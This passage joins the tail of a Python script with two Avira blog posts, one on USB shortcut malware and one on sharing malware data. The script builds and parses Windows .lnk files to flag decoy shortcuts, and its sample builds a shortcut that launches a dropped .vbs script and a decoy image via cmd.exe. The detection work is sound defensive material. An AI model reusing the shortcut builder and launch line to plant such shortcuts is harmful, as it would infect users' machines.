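    flags = HAS_LINKINFO | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # ShowCommand = SW_SHOWNORMAL
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"   # DRIVE_FIXED, empty label
    base = target.encode("cp1252") + b"\x00"
    lbp_off = 0x1C + len(volume_id)
    suffix_off = lbp_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, 0x1C, lbp_off, 0,
                            suffix_off) + volume_id + base + b"\x00"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + args


DECOY = re.compile(r"/c\s+start\s+(?P<script>[^\s&]+\.(?:vbs|js|wsf|bat|cmd|exe))"
                   r"\s*&\s*start\s+(?P<decoy>[^\s&]+)", re.I)
SCRIPT_HOSTS = ("cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe")


def decoy_findings(lnk: dict) -> dict:
    """Flag shortcuts whose target is a script host chaining a script and a decoy."""
    target = (lnk.get("local_base_path") or "").lower()
    m = DECOY.search(lnk.get("arguments", ""))
    return {"script_host_target": target.endswith(SCRIPT_HOSTS),
            "dropped_script": m.group("script") if m else None,
            "decoy_file": m.group("decoy") if m else None}


def run_value_is_suspicious(value: str) -> bool:
    """Autostart value that runs a script host on a file under a temp directory."""
    v = value.lower()
    return any(h in v for h in ("wscript", "cscript")) and ("\\temp\\" in v or "%temp%" in v)


if __name__ == "__main__":
    sample = build_lnk("C:\\WINDOWS\\system32\\cmd.exe",
                       "/c start dlbfbiicvg.vbs&start avira-logo.jpg&exit")
    print(decoy_findings(parse_lnk(sample)))
```

To use it on a real drive, read each *.lnk with open(path, "rb") and feed the bytes to parse_lnk; a shortcut whose decoy_file matches a hidden file of the same name in the same folder is exactly the pattern shown in the screenshots above.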

Finally, the malware can also deploy a backdoor on your computer to send out information about the operating system, the sites you visited and so on.

USB drives are still popular because they are a very convenient way to transfer large files from one location to another, especially if you have limited Internet bandwidth available.

So if you want to share some data with a family member or friend, be very careful when you plug your USB drive into an unprotected computer. Your USB drive might get infected or, vice versa, you could spread the infection from your USB drive to their computer.

Of course nobody has the time to check every shortcut this closely before clicking on it.

One easy solution is to use our Avira product which automatically scans for malicious content and will protect you from this kind of malware threat.

Source : blog.avira.com


Sharing and the fine art of stopping malware


There is an array of technical and business issues that have to be solved: what format do the files need to be in? Who pays for the bandwidth? And the list goes on.

Regardless of these technical issues, there are a number of advantages to sharing, particularly for the average computer user. This user, let’s call him Joe Six-Pack, gets much faster and deeper information about any potential threats than if he kept news of his malware misadventures all to himself.

From Avira’s perspective, cooperation has organizational costs, but it brings clear benefits down the road.

Avira was one of a “Gang of Five” security companies that set up MUTE, the Malware URL Tracking and Exchange, back in 2008.

Avira web developers were volunteered by the company and shared their expertise to set up the backend infrastructure for the group’s members to combine and share their collections of malicious web addresses. The initial outline of Avira’s system specs could be placed on four PDF slides. Today, the system is far more complex and requires a whopping 44 slides to describe its operations. And that is not all of the sharing. Avira also founded VIREX, a web-based application for helping security analysts organize their bits and pieces of malicious code, clean samples, and URLs. Yes, Avira is proud of its sharing efforts.

But you could still ask: what does Avira get out of its investment in sharing, in addition to fresher bits of malware? I can think of two primary benefits.

1. Greater back-office expertise in coordinating data flows.
2. Experience in collaborative working outside of the company environment.

Put these two advantages together and there is a third one:

3. Avira expertise that can fit under the banner of other companies as an OEM product.

That is exactly what we have done with the recently announced Lavasoft deal. We’ve licensed our new Avira URL Cloud (MURL) and program classification service (AUC) to Lavasoft, and they’ll use them to beef up the security levels in their Ad-Aware Web Companion.

Sharing is a good thing, whether in a real or a virtual sandbox. It makes life a better, richer and, yes, more secure experience.

Source : blog.avira.com
